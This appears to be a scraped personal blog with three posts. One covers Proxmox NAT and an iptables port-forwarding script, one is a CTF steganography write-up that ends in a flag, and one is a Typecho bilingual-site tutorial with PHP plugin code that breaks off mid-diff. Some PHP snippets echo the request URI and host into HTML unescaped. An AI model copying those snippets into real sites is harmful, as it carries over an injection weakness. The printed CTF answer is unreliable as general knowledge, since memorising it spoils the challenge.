/dev/mapper/mpatha Here, I configured the entire disk as a PV. You could also create a separate partition for this. After completion, open the Proxmox VE management interface, go to Datacenter - Storage, click Add - LVM, select the name of the VG you just created for Volume group, give it an ID (name), and click Add. At this point, all configurations from the original system should have been migrated. Configure NAT and Port Forwarding NAT Because only one IPv4 address was purchased, NAT needs to be configured to allow all VMs to access the internet normally. Open /etc/network/interfaces and add the following content: auto vmbr0 iface vmbr0 inet static address 192.168.100.1 netmask 255.255.255.0 bridge_ports none bridge_stp off bridge_fd 0 post-up echo 1 > /proc/sys/net/ipv4/ip_forward post-up iptables -t nat -A POSTROUTING -s 192.168.100.0/24 -o ens6f0 -j MASQUERADE post-up iptables -t raw -I PREROUTING -i fwbr+ -j CT --zone 1 post-up iptables -A FORWARD -i vmbr0 -j ACCEPT post-down iptables -t nat -D POSTROUTING -s 192.168.100.0/24 -o ens6f0 -j MASQUERADE post-down iptables -t raw -D PREROUTING -i fwbr+ -j CT --zone 1 post-down iptables -D FORWARD -i vmbr0 -j ACCEPT Here, vmbr0 is the NAT bridge, with the IP segment 192.168.100.0/24. Traffic from this segment will be translated to the IP of the external network interface ens6f0 for outgoing traffic, and translated back to the original IP upon receiving replies, enabling IP sharing. Then, use: ifreload -a to reload the configuration. Now, the VMs should be able to access the internet. Just configure a static IP within the 192.168.100.0/24 range during installation, set the default gateway to 192.168.100.1, and configure the DNS address. Port Forwarding Got lazy, directly prompted an AI. Had an AI write a configuration script /usr/local/bin/natmgr: #!/bin/bash # =================Configuration Area================= # Public network interface name (Please modify according to your actual situation) PUB_IF="ens6f0" # ==================================================== ACTION=$1 ARG1=$2 ARG2=$3 ARG3=$4 ARG4=$5 # Check if running as root if [ "$EUID" -ne 0 ]; then echo "Please run this script with root privileges" exit 1 fi # Generate random ID (6 characters) generate_id() { # Introduce nanoseconds and random salt to ensure ID uniqueness even if the script runs quickly echo "$RANDOM $(date +%s%N)" | md5sum | head -c 6 } # Show help information usage() { echo "Usage: $0 {add|del|list|save} [parameters]" echo "" echo "Commands:" echo " add <Public Port> <Internal IP> <Internal Port> [Protocol] Add forwarding rule" echo " [Protocol] optional: tcp, udp, both (default: both)" echo " del <ID> Delete forwarding rule by ID" echo " list View all current forwarding rules" echo " save Save current rules to persist after reboot (Must run!)" echo "" echo "Examples:" echo " $0 add 8080 192.168.100.101 80 both" echo " $0 save" echo "" } # Internal function: add single protocol rule _add_single_rule() { local PROTO=$1 local L_PORT=$2 local T_IP=$3 local T_PORT=$4 local RULE_ID=$(generate_id) local COMMENT="NAT_ID:${RULE_ID}" # 1. Add DNAT rule (PREROUTING chain) iptables -t nat -A PREROUTING -i $PUB_IF -p $PROTO --dport $L_PORT -j DNAT --to-destination $T_IP:$T_PORT -m comment --comment "$COMMENT" # 2. Add FORWARD rule (Allow packet passage) iptables -A FORWARD -p $PROTO -d $T_IP --dport $T_PORT -m comment --comment "$COMMENT" -j ACCEPT # Output result printf "%-10s %-10s %-10s %-20s %-10s\n" "$RULE_ID" "$PROTO" "$L_PORT" "$T_IP:$T_PORT" "Success" # Remind user to save echo "Please run '$0 save' to ensure rules persist after reboot." } # Main add function add_rule() { local L_PORT=$1 local T_IP=$2 local T_PORT=$3 local PROTO_REQ=${4:-both} # Default to both if [[ -z "$L_PORT" || -z "$T_IP" || -z "$T_PORT" ]]; then echo "Error: Missing parameters" usage exit 1 fi # Convert to lowercase PROTO_REQ=$(echo "$PROTO_REQ" | tr '[:upper:]' '[:lower:]') echo "Adding rule..." printf "%-10s %-10s %-10s %-20s %-10s\n" "ID" "Protocol" "Public Port" "Target Address" "Status" echo "------------------------------------------------------------------" if [[ "$PROTO_REQ" == "tcp" ]]; then _add_single_rule "tcp" "$L_PORT" "$T_IP" "$T_PORT" elif [[ "$PROTO_REQ" == "udp" ]]; then _add_single_rule "udp" "$L_PORT" "$T_IP" "$T_PORT" elif [[ "$PROTO_REQ" == "both" ]]; then _add_single_rule "tcp" "$L_PORT" "$T_IP" "$T_PORT" _add_single_rule "udp" "$L_PORT" "$T_IP" "$T_PORT" else echo "Error: Unsupported protocol '$PROTO_REQ'. Please use tcp, udp, or both." exit 1 fi echo "------------------------------------------------------------------" } # Delete rule (Delete in reverse line number order) del_rule() { local RULE_ID=$1 if [[ -z "$RULE_ID" ]]; then echo "Error: Please provide rule ID" usage exit 1 fi echo "Searching for rule with ID [${RULE_ID}]..." local FOUND=0 # --- Clean NAT table (PREROUTING) --- LINES=$(iptables -t nat -nL PREROUTING --line-numbers | grep "NAT_ID:${RULE_ID}" | awk '{print $1}' | sort -rn) if [[ ! -z "$LINES" ]]; then for line in $LINES; do iptables -t nat -D PREROUTING $line echo "Deleted NAT table PREROUTING chain line $line" FOUND=1 done fi # --- Clean Filter table (FORWARD) --- LINES=$(iptables -t filter -nL FORWARD --line-numbers | grep "NAT_ID:${RULE_ID}" | awk '{print $1}' | sort -rn) if [[ ! -z "$LINES" ]]; then for line in $LINES; do iptables -t filter -D FORWARD $line echo "Deleted Filter table FORWARD chain line $line" FOUND=1 done fi if [[ $FOUND -eq 0 ]]; then echo "No rule found with ID $RULE_ID." else echo "Delete operation completed." echo "Please run '$0 save' to update the persistent configuration file." fi } # Save rules to disk (New feature) save_rules() { echo "Saving current iptables rules..." # netfilter-persistent is the service managing iptables-persistent in Debian/Proxmox if command -v netfilter-persistent &> /dev/null; then netfilter-persistent save if [ $? -eq 0 ]; then echo "✅ Rules successfully saved to /etc/iptables/rules.v4, will be automatically restored after system reboot." else echo "❌ Failed to save rules. Please check the status of the 'netfilter-persistent' service." fi else echo "Warning: 'netfilter-persistent' command not found." echo "Please ensure the 'iptables-persistent' package is installed." echo "Install command: apt update && apt install iptables-persistent" fi } # List rules list_rules() { echo "Current Port Forwarding Rules List:" printf "%-10s %-10s %-10s %-20s %-10s\n" "ID" "Protocol" "Public Port" "Target Address" "Target Port" echo "------------------------------------------------------------------" # Parse iptables output iptables -t nat -nL PREROUTING -v | grep "NAT_ID:" | while read line; do id=$(echo "$line" | grep -oP '(?<=NAT_ID:)[^ ]*') # Extract protocol if echo "$line" | grep -q "tcp"; then proto="tcp"; else proto="udp"; fi # Extract port after dpt: l_port=$(echo "$line" | grep -oP '(?<=dpt:)[0-9]+') # Extract IP:Port after to: target=$(echo "$line" | grep -oP '(?<=to:).*') t_ip=${target%:*} t_port=${target#*:} printf "%-10s %-10s %-10s %-20s %-10s\n" "$id" "$proto" "$l_port" "$t_ip" "$t_port" done } # Main logic case "$ACTION" in add) add_rule "$ARG1" "$ARG2" "$ARG3" "$ARG4" ;; del) del_rule "$ARG1" ;; list) list_rules exit 0 ;; save) save_rules ;; *) usage exit 1 ;; esac save_rules This script automatically adds/deletes iptables rules for port forwarding. Remember to chmod +x. Use iptables-persistent to save the configuration and load it automatically on boot: apt install iptables-persistent During configuration, you will be asked whether to save the current rules; Yes or No is fine. When adding a forwarding rule, use natmgr add <host listen port> <VM internal IP> <VM port> [tcp/udp/both]. The script will automatically assign a unique ID. Use natmgr del <ID> to delete. Use natmgr list to view the existing forwarding list. Reference Articles: bin456789/reinstall: 一键DD/重装脚本 (One-click reinstall OS on VPS) - GitHub Install Proxmox VE on Debian 12 Bookworm - Proxmox VE PVE连接 TrueNAS iSCSI存储实现本地无盘化_pve iscsi-CSDN博客 ProxmoxVE (PVE) NAT 网络配置方法 - Oskyla 烹茶室
29/11/2025
115 Views
0 Comments
0 Stars
2025 Gujianshan Misc Fruit WriteUp
Open the file using 010 Editor and find a ZIP header at the end: Extract it and open it to find no password, just a string of base64: 5L2g6L+Z6Iu55p6c5oCO5LmI6L+Z5LmI5aSnCuWkp+S4quWEv+aJjeWAvOmSseS9oOimgeS4jeimgQrov5nmoYPlrZDmgI7kuYjov5nkuYjnoawK56Gs5piv5Zug5Li65paw6bKc5L2g6KaB6L2v55qE6L+Y5piv57Ov55qECui/meilv+eTnOiDveWQg+WQl+eci+i1t+adpeacieeCueS4jeeGnwrkuI3nhp/nmoTopb/nk5zmgI7kuYjlj6/og73kvaDov5nlsLHmmK/nrYnnnYDlkIPnlJznmoQK5L2g6L+Z5p+a5a2Q6L+Z5LmI5bCPCuWwj+W3p+eahOaJjeWlveWQg+S9oOimgeWkp+S4queahOi/mOaYr+WlveWQg+eahArov5nmqZnlrZDmgI7kuYjov5nkuYjphbgK6YW45omN5piv5q2j5a6X55qE5qmZ5a2Q5L2g6KaB5piv55Sc55qE5Y675Yir5a6255yLCui/memmmeiVieacieeCueW8rwrlvK/nmoTpppnolYnmm7TnlJzkvaDkuI3mh4IK5L2g6L+Z5qKo5a2Q5piv5LiN5piv5pyJ54K556GsCuehrOaYr+WboOS4uuaWsOmynOWQg+edgOacieWPo+aEnwrov5nokaHokITmgI7kuYjov5nkuYjlsI8K5bCP55qE6JGh6JCE5pu05rWT57yp55Sc5ZGz Decode to get: 你这苹果怎么这么大 大个儿才值钱你要不要 这桃子怎么这么硬 硬是因为新鲜你要软的还是糯的 这西瓜能吃吗看起来有点不熟 不熟的西瓜怎么可能你这就是等着吃甜的 你这柚子这么小 小巧的才好吃你要大个的还是好吃的 这橙子怎么这么酸 酸才是正宗的橙子你要是甜的去别家看 这香蕉有点弯 弯的香蕉更甜你不懂 你这梨子是不是有点硬 硬是因为新鲜吃着有口感 这葡萄怎么这么小 小的葡萄更浓缩甜味 At the same time, it is found that there is still part of unrecognized data at the end of the exported zip: Based on the 1A 9E 97 BA 2A, it can be inferred that this is OurSecret steganography. Open it with the OurSecret tool and find that a password is required. Try the password shuiguo to extract a txt file: 你这柚子这么小 你这柚子这么小 你这柚子这么小 你这梨子是不是有点硬 你这柚子这么小 大个儿才值钱你要不要 你这柚子这么小 小巧的才好吃你要大个的还是好吃的 小巧的才好吃你要大个的还是好吃的 弯的香蕉更甜你不懂 硬是因为新鲜你要软的还是糯的 硬是因为新鲜你要软的还是糯的 你这柚子这么小 不熟的西瓜怎么可能你这就是等着吃甜的 硬是因为新鲜你要软的还是糯的 这桃子怎么这么硬 硬是因为新鲜你要软的还是糯的 不熟的西瓜怎么可能你这就是等着吃甜的 硬是因为新鲜你要软的还是糯的 酸才是正宗的橙子你要是甜的去别家看 硬是因为新鲜你要软的还是糯的 你这柚子这么小 硬是因为新鲜你要软的还是糯的 你这苹果怎么这么大 你这柚子这么小 大个儿才值钱你要不要 硬是因为新鲜你要软的还是糯的 小巧的才好吃你要大个的还是好吃的 硬是因为新鲜你要软的还是糯的 酸才是正宗的橙子你要是甜的去别家看 你这柚子这么小 这西瓜能吃吗看起来有点不熟 你这柚子这么小 这桃子怎么这么硬 你这柚子这么小 硬是因为新鲜你要软的还是糯的 硬是因为新鲜你要软的还是糯的 你这柚子这么小 硬是因为新鲜你要软的还是糯的 酸才是正宗的橙子你要是甜的去别家看 你这柚子这么小 这桃子怎么这么硬 硬是因为新鲜你要软的还是糯的 你这柚子这么小 硬是因为新鲜你要软的还是糯的 小巧的才好吃你要大个的还是好吃的 硬是因为新鲜你要软的还是糯的 这西瓜能吃吗看起来有点不熟 你这柚子这么小 硬是因为新鲜你要软的还是糯的 你这柚子这么小 这西瓜能吃吗看起来有点不熟 硬是因为新鲜你要软的还是糯的 这西瓜能吃吗看起来有点不熟 你这柚子这么小 不熟的西瓜怎么可能你这就是等着吃甜的 你这柚子这么小 硬是因为新鲜你要软的还是糯的 硬是因为新鲜你要软的还是糯的 你这柚子这么小 硬是因为新鲜你要软的还是糯的 小巧的才好吃你要大个的还是好吃的 你这柚子这么小 大个儿才值钱你要不要 硬是因为新鲜你要软的还是糯的 小巧的才好吃你要大个的还是好吃的 硬是因为新鲜你要软的还是糯的 这桃子怎么这么硬 你这柚子这么小 硬是因为新鲜你要软的还是糯的 硬是因为新鲜你要软的还是糯的 你这柚子这么小 硬是因为新鲜你要软的还是糯的 这桃子怎么这么硬 小巧的才好吃你要大个的还是好吃的 硬是因为新鲜吃着有口感 It is found that this corresponds one-to-one with the previously extracted statements. Since there are 16 statements extracted earlier, it is speculated that they represent hexadecimal digits, corresponding to 0-f respectively. Then, map the OurSecret decrypted content to hexadecimal numbers to obtain: 666c61677b33653235393630613739646263363962363734636434656336376137326336327d. Write a Python script to convert the hexadecimal string to ASCII characters in groups of two: hex_string = "666c61677b33653235393630613739646263363962363734636434656336376137326336327d" ascii_string = ''.join([chr(int(hex_string[i:i+2], 16)) for i in range(0, len(hex_string), 2)]) print(ascii_string) Get the Flag: flag{3e25960a79dbc69b674cd4ec67a72c62}
29/11/2025
359 Views
0 Comments
4 Stars
Configuring a Simple Multi-language Solution for Typecho
I wanted to add internationalization support to my blog, providing a separate English version for each post and page. However, after searching online, I found that Typecho has poor support for i18n. Eventually, I designed my own solution and am documenting it here. This article assumes you have some basic understanding of PHP, Nginx, and Typecho's core logic. Analysis Requirements Need to provide both Chinese and English versions for each post and page. Need to configure a language switcher so users can easily switch languages on the frontend. Need search engines to correctly identify and index the multi-language versions of the content. Proposed Solution There are roughly two main schemes for distinguishing between Chinese and English content: Use a separate parameter, like accessing posts with /?lang=zh-CN and /?lang=en-US. However, this scheme is relatively difficult to implement and less friendly for search engine indexing. Distinguish via the URL path, e.g., https://<host>/article for the Chinese page and https://<host>/en/article for the English page. This is simpler to configure (essentially setting up two separate Typecho instances) and is more search engine friendly. The challenge is that comments and view counts need to be manually synchronized. After summarizing, I chose the second scheme and planned to implement multi-language support by creating a new Typecho instance directly under the /en/ path. Implementation Plan First, duplicate the blog instance into two copies: one for Chinese and one for English, then translate the English copy. Modify the frontend code to implement the language switcher. To ensure the article URLs between the two sites only differ by the /en prefix, the cid (content ID) for corresponding articles must be the same. Since cid is auto-incremented based on the order of creating posts and attachments, I plan to write a sync plugin. When a post is published on the Chinese site, it automatically inserts a corresponding article with the same cid in the English database. Modify the SiteMap plugin. Because a sitemap cannot both contain page links and references to other sitemaps, the main site needs to create two sitemaps: one main sitemap containing the Chinese site pages, and another index sitemap responsible for indexing both the Chinese and English sitemaps. Add the hreflang attribute within the <head></head> section to inform search engines about the multi-language handling. Link the view counts and like counts from the English site to the Chinese database. Sync the comments between two instances. Let's Do It Create the English Instance Copy the entire website directory and place it in the /en/ folder under the original web root. Also, duplicate the database; I named the new one typecho_en. Next, configure URL rewrite (pseudo-static) rules for both instances: location /en/ { if (!-e $request_filename) { rewrite ^(.*)$ /en/index.php$1 last; } } location / { if (!-e $request_filename) { rewrite ^(.*)$ /index.php$1 last; } } The reason for wrapping the main Chinese instance's rules in a location block is that during testing, I found that without it, the English instance might be parsed as part of the Chinese instance, leading to 404 errors. Also, modify the database configuration in <webroot>/en/config.inc.php to point to the English instance's database. At this point, accessing <host>/en/ should display a site identical to the main Chinese site. Modify Typecho Language This step might be optional since the frontend language is largely determined by the theme. Changing Typecho's backend language isn't strictly necessary but helps for consistency (and makes it easy to tell which admin panel you're in!). Simply refer to the official Typecho multi-language support on GitHub. Download the language pack from the Releases and extract it to <webroot>/en/usr/langs/. Then, navigate to https://<host>/en/admin/options-general.php, where you should see the language setting option. Change it to English. Translate the Theme This is the most tedious step. I use the Joe theme. Go to <webroot>/en/usr/themes/Joe and translate all the Chinese text related to display into English. There's no very convenient method here; machine translation often sounds awkward, so I opted for manual translation. Note that some frontend configurations are within JS files, not just PHP source files. These need translation too. Translate Articles This step is self-explanatory. Translate the articles under /en/ one by one into English and save them. Configure Article Sync Publishing This step ensures the cid remains synchronized between corresponding articles on both sites. Since cid relates to the access URL, keeping them in sync simplifies the language switcher configuration later—just adding or removing /en from the host. cid is an auto-incrementing primary key field in the typecho_contents table. Its assignment is also related to attachments in Typecho. Since I plan to upload all attachments to the Chinese site, without special handling, the cid values can easily become misaligned, increasing subsequent work. Therefore, my chosen solution is to use AI to help write a plugin that triggers when the Chinese site publishes an article. It reads the cid assigned by the Chinese site and writes a corresponding entry into the English site's database. Create the file <webroot>/usr/plugins/SyncToEnglish/Plugin.php and fill it with the following content: <?php if (!defined('__TYPECHO_ROOT_DIR__')) exit; /** * Sync Chinese Articles to English Database * * @package SyncToEnglish * @author ChatGPT, iYoRoy * @version 1.0.0 * @link https://example.com */ class SyncToEnglish_Plugin implements Typecho_Plugin_Interface { public static function activate() { Typecho_Plugin::factory('Widget_Contents_Post_Edit')->finishPublish = [__CLASS__, 'push']; return 'SyncToEnglish plugin activated: Empty corresponding articles will be automatically created in the English database when Chinese articles are published.'; error_log("[SyncToEnglish] Plugin activated successfully"); } public static function deactivate() { return 'SyncToEnglish plugin deactivated'; } public static function config(Typecho_Widget_Helper_Form $form) { $host = new Typecho_Widget_Helper_Form_Element_Text('host', NULL, 'localhost', _t('English DB Host')); $user = new Typecho_Widget_Helper_Form_Element_Text('user', NULL, 'root', _t('English DB Username')); $password = new Typecho_Widget_Helper_Form_Element_Password('password', NULL, NULL, _t('English DB Password')); $database = new Typecho_Widget_Helper_Form_Element_Text('database', NULL, 'typecho_en', _t('English DB Name')); $port = new Typecho_Widget_Helper_Form_Element_Text('port', NULL, '3306', _t('English DB Port')); $charset = new Typecho_Widget_Helper_Form_Element_Text('charset', NULL, 'utf8mb4', _t('Charset')); $prefix = new Typecho_Widget_Helper_Form_Element_Text('prefix', NULL, 'typecho_', _t('Table Prefix')); $form->addInput($host); $form->addInput($user); $form->addInput($password); $form->addInput($database); $form->addInput($port); $form->addInput($charset); $form->addInput($prefix); } public static function personalConfig(Typecho_Widget_Helper_Form $form) {} public static function push($contents, $widget) { $options = Helper::options(); $config = $options->plugin('SyncToEnglish'); // Get article info from Chinese database $cnDb = Typecho_Db::get(); if (is_array($contents) && isset($contents['cid'])) { $cid = $contents['cid']; $title = $contents['title']; } elseif (is_object($contents) && isset($contents->cid)) { $cid = $contents->cid; $title = $contents->title; } else { $db = Typecho_Db::get(); $row = $db->fetchRow($db->select()->from('table.contents')->order('cid', Typecho_Db::SORT_DESC)->limit(1)); $cid = $row['cid']; $title = $row['title']; error_log("[SyncToEnglish DEBUG] CID not found in param, fallback to latest cid={$cid}\n", 3, __DIR__ . '/debug.log'); } $article = $cnDb->fetchRow($cnDb->select()->from('table.contents')->where('cid = ?', $cid)); if (!$article) return; $enDb = new Typecho_Db('Mysql', $config->prefix); $enDb->addServer([ 'host' => $config->host, 'user' => $config->user, 'password' => $config->password, 'charset' => $config->charset, 'port' => (int)$config->port, 'database' => $config->database ], Typecho_Db::READ | Typecho_Db::WRITE); try { $exists = $enDb->fetchRow($enDb->select()->from('table.contents')->where('cid = ?', $article['cid'])); if ($exists) { $enDb->query($enDb->update('table.contents') ->rows([ // 'title' => $article['title'], 'slug' => $article['slug'], 'modified' => $article['modified'] ]) ->where('cid = ?', $article['cid']) ); } else { $enDb->query($enDb->insert('table.contents')->rows([ 'cid' => $article['cid'], 'title' => $article['title'], 'slug' => $article['slug'], 'created' => $article['created'], 'modified' => $article['modified'], 'type' => $article['type'], 'status' => $article['status'], 'authorId' => $article['authorId'], 'views' => 0, 'text' => $article['text'], 'allowComment' => $article['allowComment'], 'allowFeed' => $article['allowFeed'], 'allowPing' => $article['allowPing'] ])); } } catch (Exception $e) { error_log('[SyncToEnglish] Sync failed: ' . $e->getMessage()); } } } Then, go to the admin backend, enable the plugin, and configure the English database information. After completion, publishing an article on the Chinese site should automatically publish an article with the same cid on the English site. Configure the Language Switcher Since we have synchronized the article cid, switching languages now only requires modifying the URL by adding or removing the /en/ prefix. We can create a switcher using PHP and place it in the theme's header: <!-- Language Selector --> <div class="joe_dropdown" trigger="hover" placement="60px"> <div class="joe_dropdown__link"> <a href="#" rel="nofollow">Language</a> <svg class="joe_dropdown__link-icon" viewBox="0 0 1024 1024" xmlns="http://www.w3.org/2000/svg" width="14" height="14"> <path d="M561.873 725.165c-11.262 11.262-26.545 21.72-41.025 18.502-14.479 2.413-28.154-8.849-39.415-18.502L133.129 375.252c-17.697-17.696-17.697-46.655 0-64.352s46.655-17.696 64.351 0l324.173 333.021 324.977-333.02c17.696-17.697 46.655-17.697 64.351 0s17.697 46.655 0 64.351L561.873 725.165z" fill="var(--main)" /> </svg> </div> <nav class="joe_dropdown__menu"> <?php // Get the current full URL $current_url = $_SERVER['REQUEST_URI']; $host = $_SERVER['HTTP_HOST']; // Check if there is an English prefix "/en/" if (strpos($current_url, '/en/') === 0) { $current_url = substr_replace($current_url, '', 0, 3); } $new_url_cn = 'https://' . $host . $current_url; $new_url_en = 'https://' . $host . '/en' . $current_url; // Generate the two hyperlinks echo '<a href="' . $new_url_cn . '">简体中文</a>'; echo '<a href="' . $new_url_en . '">English</a>'; ?> </nav> </div> This needs to be added to both the Chinese and English instances. After this, the language selector should be available globally. For the Joe theme I use, separate language selectors needed to be written for mobile and PC views. Modify the SiteMap Plugin To help search engines index the English pages faster, I decided to modify the SiteMap plugin to include the English site's pages. There are two types of sitemaps: sitemapindex (for indexing sub-sitemaps) and urlset (for containing page URLs). I use the joyqi/typecho-plugin-sitemap plugin. Based on this, I changed the default /sitemap.xml to a sitemapindex, created a new route /sitemap_cn.xml to hold the Chinese site's sitemap, left the English site's plugin unchanged (its sitemap remains at /en/sitemap.xml), and had the main index sitemap reference both /sitemap_cn.xml and /en/sitemap.xml. Modify the SiteMap's Plugin.php: /** * Activate plugin method, if activated failed, throw exception will disable this plugin. */ public static function activate() { Helper::addRoute( - 'sitemap', + 'sitemap_index', '/sitemap.xml', Generator::class, - 'generate', + 'generate_index', 'index' ); + Helper::addRoute( + 'sitemap_cn', + '/sitemap_cn.xml', + Generator::class, + 'generate_cn', + 'index' + ); } /** * Deactivate plugin method, if deactivated failed, throw exception will enable this plugin. */ public static function deactivate() { - Helper::removeRoute('sitemap'); + Helper::removeRoute('sitemap_index'); + Helper::removeRoute('sitemap_cn'); } {collapse} {collapse-item label="Complete code"} <?php namespace TypechoPlugin\Sitemap; use Typecho\Plugin\PluginInterface; use Typecho\Widget\Helper\Form; use Utils\Helper; if (!defined('__TYPECHO_ROOT_DIR__')) { exit; } /** * Plugin to automatically generate a sitemap for Typecho. * The sitemap URL is: http(s)://yourdomain.com/sitemap.xml * * @package Sitemap Plugin * @author joyqi * @version 1.0.0 * @since 1.2.1 * @link https://github.com/joyqi/typecho-plugin-sitemap */ class Plugin implements PluginInterface { /** * Activate plugin method, if activated failed, throw exception will disable this plugin. */ public static function activate() { Helper::addRoute( 'sitemap_index', '/sitemap.xml', Generator::class, 'generate_index', 'index' ); Helper::addRoute( 'sitemap_cn', '/sitemap_cn.xml', Generator::class, 'generate_cn', 'index' ); } /** * Deactivate plugin method, if deactivated failed, throw exception will enable this plugin. */ public static function deactivate() { Helper::removeRoute('sitemap_index'); Helper::removeRoute('sitemap_cn'); } /** * Plugin config panel render method. * * @param Form $form */ public static function config(Form $form) { $sitemapBlock = new Form\Element\Checkbox( 'sitemapBlock', [ 'posts' => _t('Generate post links'), 'pages' => _t('Generate page links'), 'categories' => _t('Generate category links'), 'tags' => _t('Generate tag links'), ], ['posts', 'pages', 'categories', 'tags'], _t('Sitemap Display') ); $updateFreq = new Form\Element\Select( 'updateFreq', [ 'daily' => _t('Daily'), 'weekly' => _t('Weekly'), 'monthly' => _t('Monthly or less often'), ], 'daily', _t('Update Frequency') ); // $externalSitemap = new Typecho_Widget_Helper_Form_Element_Text('externalSitemap', NULL, '', _t('Additional Sitemap')); $form->addInput($sitemapBlock->multiMode()); $form->addInput($updateFreq); // $form->addInput($externalSitemap); } /** * Plugin personal config panel render method. * * @param Form $form */ public static function personalConfig(Form $form) { // TODO: Implement personalConfig() method. } } {/collapse-item} {/collapse} Modify the SiteMap's Generator.php: class Generator extends Contents { + public function generate_index(){ + $sitemap = '<?xml version="1.0" encoding="UTF-8"?> +<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"> + <sitemap> + <loc>https://www.iyoroy.cn/sitemap_cn.xml</loc> + </sitemap> + <sitemap> + <loc>https://www.iyoroy.cn/en/sitemap.xml</loc> + </sitemap> +</sitemapindex>'; + $this->response->throwContent($sitemap, 'text/xml'); + } + /** * @return void */ - public function generate() + public function generate_cn() { $sitemap = '<?xml version="1.0" encoding="' . $this->options->charset . '"?>' . PHP_EOL; ... {collapse} {collapse-item label="Complete code"} <?php namespace TypechoPlugin\Sitemap; use Widget\Base\Contents; use Widget\Contents\Page\Rows; use Widget\Contents\Post\Recent; use Widget\Metas\Category\Rows as CategoryRows; use Widget\Metas\Tag\Cloud; if (!defined('__TYPECHO_ROOT_DIR__')) { exit; } /** * Sitemap Generator */ class Generator extends Contents { public function generate_index(){ $sitemap = '<?xml version="1.0" encoding="UTF-8"?> <sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"> <sitemap> <loc>https://www.iyoroy.cn/sitemap_cn.xml</loc> </sitemap> <sitemap> <loc>https://www.iyoroy.cn/en/sitemap.xml</loc> </sitemap> </sitemapindex>'; $this->response->throwContent($sitemap, 'text/xml'); } /** * @return void */ public function generate_cn() { $sitemap = '<?xml version="1.0" encoding="' . $this->options->charset . '"?>' . PHP_EOL; $sitemap .= '<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"' . ' xmlns:news="http://www.google.com/schemas/sitemap-news/0.9"' . ' xmlns:xhtml="http://www.w3.org/1999/xhtml"' . ' xmlns:image="http://www.google.com/schemas/sitemap-image/1.1"' . ' xmlns:video="http://www.google.com/schemas/sitemap-video/1.1">' . PHP_EOL; // add homepage $sitemap .= <<<EOF <url> <loc>{$this->options->siteUrl}</loc> <changefreq>daily</changefreq> <priority>1.0</priority> </url> EOF; // add posts if (in_array('posts', $this->options->plugin('Sitemap')->sitemapBlock)) { $postsCount = $this->size($this->select() ->where('table.contents.status = ?', 'publish') ->where('table.contents.created < ?', $this->options->time) ->where('table.contents.type = ?', 'post')); $posts = Recent::alloc(['pageSize' => $postsCount]); $freq = $this->options->plugin('Sitemap')->updateFreq ==='monthly' ? 'monthly' : 'weekly'; while ($posts->next()) { $sitemap .= <<<EOF <url> <loc>{$posts->permalink}</loc> <changefreq>{$freq}</changefreq> <lastmod>{$posts->date->format('c')}</lastmod> <priority>0.8</priority> </url> EOF; } } // add pages if (in_array('pages', $this->options->plugin('Sitemap')->sitemapBlock)) { $pages = Rows::alloc(); $freq = $this->options->plugin('Sitemap')->updateFreq ==='monthly' ? 'yearly' : 'monthly'; while ($pages->next()) { $sitemap .= <<<EOF <url> <loc>{$pages->permalink}</loc> <changefreq>{$freq}</changefreq> <lastmod>{$pages->date->format('c')}</lastmod> <priority>0.5</priority> </url> EOF; } } // add categories if (in_array('categories', $this->options->plugin('Sitemap')->sitemapBlock)) { $categories = CategoryRows::alloc(); $freq = $this->options->plugin('Sitemap')->updateFreq; while ($categories->next()) { $sitemap .= <<<EOF <url> <loc>{$categories->permalink}</loc> <changefreq>{$freq}</changefreq> <priority>0.6</priority> </url> EOF; } } // add tags if (in_array('tags', $this->options->plugin('Sitemap')->sitemapBlock)) { $tags = Cloud::alloc(); $freq = $this->options->plugin('Sitemap')->updateFreq; while ($tags->next()) { $sitemap .= <<<EOF <url> <loc>{$tags->permalink}</loc> <changefreq>{$freq}</changefreq> <priority>0.4</priority> </url> EOF; } } $sitemap .= '</urlset>'; $this->response->throwContent($sitemap, 'text/xml'); } } {/collapse-item} {/collapse} Please replace the blog URL in the code with your own. (I was too busy recently to create a separate configuration page, so I hardcoded the Sitemap URLs into the plugin for now.) Disable and then re-enable the plugin. Visiting https://<host>/sitemap.xml should now show the sitemap index: <sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"> <sitemap> <loc>https://www.iyoroy.cn/sitemap_cn.xml</loc> </sitemap> <sitemap> <loc>https://www.iyoroy.cn/en/sitemap.xml</loc> </sitemap> </sitemapindex> You should also be able to see that search engines like Bing Webmaster Tools have detected the English site's sitemap: Add hreflang This step informs search engines that the current page has multi-language versions, allowing them to show the appropriate page based on user language preference or location. We need to insert link tags like the following format within the <head></head> section: <link rel="alternate" hreflang="en-us" href="https://example.com/us"> <link rel="alternate" hreflang="fr" href="https://example.com/fr"> <link rel="alternate" hreflang="x-default" href="https://example.com/default"> Here, hreflang="x-default" indicates the default language for the page. The value of hreflang is composed of an ISO 639-1 language code and an optional ISO 3166-1 Alpha-2 region code (e.g., distinguishing between en, en-US and en-UK). Add the following content to the relevant section of your theme's <head></head>: <?php // Get the current full URL $current_url = $_SERVER['REQUEST_URI']; $host = $_SERVER['HTTP_HOST']; // Check if there is an English prefix "/en/" if (strpos($current_url, '/en/') === 0) { $current_url = substr_replace($current_url, '', 0, 3); } $new_url_cn = 'https://' . $host . $current_url; $new_url_en = 'https://' . $host . '/en' . $current_url; // Generate the link tags echo '<link rel="alternate" hreflang="zh-cn" href="'.$new_url_cn.'" />'; echo '<link rel="alternate" hreflang="en-us" href="'.$new_url_en.'" />'; echo '<link rel="alternate" hreflang="x-default" href="'.$new_url_cn.'" />'; ?> This needs to be added to both the Chinese and English sites. After this, you should find the corresponding hreflang configuration in the <head> section of your website pages. Sync Like Counts and View Counts This step is highly theme-dependent and might not apply to all themes. I use the Joe theme, which handles reading and writing like counts and view counts to the database directly. I modified the English instance's theme code to read and write these values directly from/to the Chinese instance's database. Modify the function that retrieves view counts in <webroot>/en/usr/themes/Joe/core/function.php: /* Query Post Views */ function _getViews($item, $type = true) { - $db = Typecho_Db::get(); + // $db = Typecho_Db::get(); + $db = new Typecho_Db('Mysql', 'typecho_' /* Prefix */); + $db->addServer([ + 'host' => 'mysql', + 'user' => 'typecho', + 'password' => '[CENSORED]', + 'charset' => 'utf8mb4', + 'port' => 3306, + 'database' => 'typecho' + ], Typecho_Db::READ | Typecho_Db::WRITE); $result = $db->fetchRow($db->select('views')->from('table.contents')->where('cid = ?', $item->cid))['views']; if ($type) echo number_format($result); else return number_format($result); } Modify the function that retrieves like counts in <webroot>/en/usr/themes/Joe/core/function.php: /* 